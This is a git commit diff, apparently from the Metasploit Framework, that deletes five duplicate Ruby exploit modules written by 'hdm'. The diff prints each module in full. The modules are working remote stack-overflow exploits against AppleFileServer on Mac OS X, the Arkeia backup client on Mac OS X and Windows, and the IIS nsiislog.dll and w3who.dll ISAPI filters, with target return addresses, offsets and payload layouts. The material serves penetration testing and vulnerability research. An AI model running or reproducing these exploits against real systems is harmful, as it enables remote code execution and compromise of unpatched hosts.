Removing dupes

git-svn-id: file:///home/svn/incoming/trunk@3255 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-12-26 14:36:25 +00:00
parent 97129d0303
commit 53a49f55d4
5 changed files with 0 additions and 500 deletions


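--- a/[path not shown on rendered page]
+++ /dev/null
@@ -1,88 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
-include Exploit::Remote::Tcp
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'AppleFileServer LoginExt PathName Overflow',
-'Description' => %q{
-This module exploits a stack overflow in the AppleFileServer service
-on MacOS X. This vulnerability was originally reported by Atstake and
-was actually one of the few useful advisories ever published by that
-company. You only have one chance to exploit this bug.
-This particular exploit uses a stack-based return address that will
-only work under optimal conditions.
-},
-'Author' => 'hdm',
-'Version' => '$Revision$',
-'References' =>
-[
-[ 'OSVDB', '5762' ],
-[ 'MIL', '2' ],
-],
-'Payload' =>
-{
-'Space' => 512,
-'BadChars' => "\x00\x20",
-'MinNops' => 128,
-'Compat' =>
-{
-'ConnectionType' => "+find"
-}
-},
-'Targets' =>
-[
-# Target 0
-[
-'Mac OS X 10.3.3',
-{
-'Platform' => 'osx',
-'Arch' => ARCH_PPC,
-'Ret' => 0xf0101c0c # stack address :<
-},
-],
-],
-'DisclosureDate' => 'May 3 2004'))
-# Configure the default port to be AFP
-register_options(
-[
-Opt::RPORT(548),
-], self.class)
-end
-def exploit
-connect
-print_status("Trying target #{target.name}...")
-path = "\xff" * 1024
-path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
-path[172, payload.encoded.length] = payload.encoded
-# The AFP header
-afp = "\x3f\x00\x00\x00"
-# Add the authentication methods
-["AFP3.1", "Cleartxt Passwrd"].each { |m|
-afp << [m.length].pack('C') + m
-}
-# Add the user type and afp path
-afp << "\x03" + [9].pack('n') + Rex::Text.rand_text_alphanumeric(9)
-afp << "\x03" + [path.length].pack('n') + path
-sock.write(afp)
-handler
-disconnect
-end
-end
-end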


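--- a/[path not shown on rendered page]
+++ /dev/null
@@ -1,105 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
-include Exploit::Remote::Arkeia
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
-'Description' => %q{
-This module exploits a stack overflow in the Arkeia backup
-client for the Mac OS X platform. This vulnerability affects
-all versions up to and including 5.3.3 and has been tested
-with Arkeia 5.3.1 on Mac OS X 10.3.5.
-},
-'Author' => [ 'hdm' ],
-'Version' => '$Revision$',
-'References' =>
-[
-[ 'OSVDB', '14011'],
-[ 'BID', '12594'],
-[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
-[ 'MIL', '6'],
-],
-'Privileged' => true,
-'Payload' =>
-{
-'Space' => 1000,
-'BadChars' => "\x00",
-'MinNops' => 700,
-},
-'Targets' =>
-[
-[
-'Arkeia 5.3.1 Stack Return (boot)',
-{
-'Platform' => 'osx',
-'Arch' => ARCH_PPC,
-'Ret' => 0xbffff910,
-},
-],
-],
-'DisclosureDate' => 'Feb 18 2005',
-'DefaultTarget' => 0))
-end
-def check
-info = arkeia_info()
-if(not (info and info['Version']))
-return Exploit::CheckCode::Safe
-end
-print_status("Arkeia Server Information:")
-info.each_pair { |k,v|
-print_status(" #{k + (" " * (30-k.length))} = #{v}")
-}
-if (info['System'] !~ /Darwin/)
-print_status("This module only supports Mac OS X targets")
-return Exploit::CheckCode::Detected
-end
-if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
-return Exploit::CheckCode::Vulnerable
-end
-return Exploit::CheckCode::Safe
-end
-def exploit
-connect
-# Request has to be big enough to find and small enough
-# not to write off the end of the stack. If we write too
-# far down, we also smash env[], which causes a crash in
-# getenv() before our function returns.
-head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
-buf = Rex::Text.rand_text_english(1200, payload_badchars)
-# Return back to the stack either directly or via system lib
-buf[0, 112] = [target.ret].pack('N') * (112/4)
-# Huge nop slep followed by the payload
-buf[112, payload.encoded.length] = payload.encoded
-head[6, 2] = [buf.length].pack('n')
-begin
-sock.put(head)
-sock.put(buf)
-sock.get_once
-rescue IOError, EOFError => e
-print_status("Exception: #{e.class}:#{e.to_s}")
-end
-handler
-disconnect
-end
-end
-end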


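--- a/[path not shown on rendered page]
+++ /dev/null
@@ -1,117 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
-include Exploit::Remote::Arkeia
-include Exploit::Remote::Seh
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
-'Description' => %q{
-This module exploits a stack overflow in the Arkeia backup
-client for the Windows platform. This vulnerability affects
-all versions up to and including 5.3.3.
-},
-'Author' => [ 'hdm' ],
-'Version' => '$Revision$',
-'References' =>
-[
-[ 'OSVDB', '14011'],
-[ 'BID', '12594'],
-[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
-[ 'MIL', '7'],
-],
-'Privileged' => true,
-'DefaultOptions' =>
-{
-'EXITFUNC' => 'process',
-},
-'Payload' =>
-{
-'Space' => 1000,
-'BadChars' => "\x00",
-'StackAdjustment' => -3500,
-},
-'Targets' =>
-[
-['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe
-['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe
-['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe
-['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe
-['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll
-['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll
-['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll
-['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll
-['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll
-['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll
-['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll
-],
-'DisclosureDate' => 'Feb 18 2005',
-'DefaultTarget' => 0))
-end
-def check
-info = arkeia_info()
-if(not (info and info['Version']))
-return Exploit::CheckCode::Safe
-end
-print_status("Arkeia Server Information:")
-info.each_pair { |k,v|
-print_status(" #{k + (" " * (30-k.length))} = #{v}")
-}
-if (info['System'] !~ /Windows/)
-print_status("This module only supports Windows targets")
-return Exploit::CheckCode::Detected
-end
-if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
-return Exploit::CheckCode::Vulnerable
-end
-return Exploit::CheckCode::Safe
-end
-def exploit
-connect
-print_status("Trying target #{target.name}...")
-head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
-data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
-head[6, 2] = [data.length].pack('n')
-begin
-sock.put(head)
-sock.put(data)
-sock.get_once
-rescue IOError, EOFError => e
-print_status("Exception: #{e.class}:#{e.to_s}")
-end
-handler
-disconnect
-end
-def prep_ark5
-data = Rex::Text.rand_text_english(4096, payload_badchars)
-data[1176, 4] = [target['Rets'][0]].pack('V')
-data[1172, 2] = "\xeb\xf9"
-data[1167, 5] = "\xe98" + [-1172].pack('V')
-data[0, payload.encoded.length] = payload.encoded
-end
-def prep_ark4
-data = Rex::Text.rand_text_english(4096, payload_badchars)
-seh = generate_seh_payload( target['Rets'][0] )
-data[ 96, seh.length] = seh
-end
-end
-end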


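--- a/[path not shown on rendered page]
+++ /dev/null
@@ -1,101 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
-include Exploit::Remote::HttpClient
-include Exploit::Remote::BruteTargets
-include Exploit::Remote::Seh
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'IIS nsiislog.dll ISAPI POST Overflow',
-'Description' => %q{
-This exploits a buffer overflow found in the nsiislog.dll
-ISAPI filter that comes with Windows Media Server. This
-module will also work against the 'patched' MS03-019
-version. This vulnerability was addressed by MS03-022.
-},
-'Author' => [ 'hdm' ],
-'Version' => '$Revision$',
-'References' =>
-[
-[ 'OSVDB', '4535'],
-[ 'MSB', 'MS03-022'],
-[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
-[ 'MIL', '30'],
-],
-'Privileged' => false,
-'Payload' =>
-{
-'Space' => 1024,
-'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
-},
-'Platform' => 'win',
-'Targets' =>
-[
-['Brute Force', { }],
-['Windows 2000 -MS03-019', { 'Rets' => [ 9769, 0x40f01333 ] }],
-['Windows 2000 +MS03-019', { 'Rets' => [ 13869, 0x40f01353 ] }],
-['Windows XP -MS03-019', { 'Rets' => [ 9773, 0x40f011e0 ] }],
-],
-'DisclosureDate' => 'Jun 25 2003',
-'DefaultTarget' => 0))
-register_options(
-[
-OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
-], self)
-end
-def check
-c = connect
-req = c.request({ 'uri' => datastore['URL'] })
-res = c.send_request(req, -1)
-if (res and res.body =~ /NetShow ISAPI/)
-return Exploit::CheckCode::Detected
-end
-return Exploit::CheckCode::Safe
-end
-def exploit_target(target)
-c = connect
-buf = ''
-%w{
-date time c-dns cs-uri-stem c-starttime
-x-duration c-rate c-status c-playerid c-playerversion
-c-playerlanguage cs(User-Agent) cs(Referer) c-hostexe
-}.each do |field|
-buf << field + '=' + 'BOOM&'
-end
-pat = 'O' * 65535
-seh = generate_seh_payload(target['Rets'][1])
-pat[ target['Rets'][0] - 4, seh.length] = seh
-buf << pat
-req = c.request({
-'uri' => datastore['URL'],
-'method' => 'POST',
-'user-agent' => 'NSPlayer/2.0',
-'content-type' => 'application/x-www-form-urlencoded',
-'data' => buf,
-})
-print_status("Sending request...")
-c.send_request(req, 0)
-handler
-disconnect
-end
-end
-end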


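--- a/[path not shown on rendered page]
+++ /dev/null
@@ -1,89 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
-include Exploit::Remote::HttpClient
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'IIS w3who.dll ISAPI Overflow',
-'Description' => %q{
-This module exploits a stack overflow in the w3who.dll ISAPI
-application. This vulnerability was discovered Nicolas
-Gregoire and this code has been successfully tested against
-Windows 2000 and Windows XP (SP2). When exploiting Windows
-XP, the payload must call RevertToSelf before it will be
-able to spawn a command shell.
-},
-'Author' => [ 'hdm' ],
-'Version' => '$Revision$',
-'References' =>
-[
-[ 'OSVDB', '12258'],
-[ 'CVE', '2004-1134'],
-[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
-[ 'MIL', '32'],
-[ 'BID', '11820'],
-],
-'Privileged' => false,
-'DefaultOptions' =>
-{
-'EXITFUNC' => 'process',
-},
-'Payload' =>
-{
-'Space' => 632,
-'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
-'MinNops' => 128,
-},
-'Platform' => 'win',
-'Targets' =>
-[
-['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
-['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
-],
-'DisclosureDate' => 'Dec 6 2004'))
-register_options(
-[
-OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
-], self)
-end
-def check
-c = connect
-req = c.request({ 'uri' => datastore['URL'] })
-res = c.send_request(req, -1)
-if (res and res.body =~ /Access Token/)
-return Exploit::CheckCode::Vulnerable
-end
-return Exploit::CheckCode::Safe
-end
-def exploit
-c = connect
-buf = Rex::Text.rand_text_english(8192, payload_badchars)
-buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
-buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
-buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
-buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
-url = datastore['URL'] + '?' + buf
-req = c.request({ 'uri' => url })
-print_status("Sending request...")
-c.send_request(req, 0)
-handler
-disconnect
-end
-end
-end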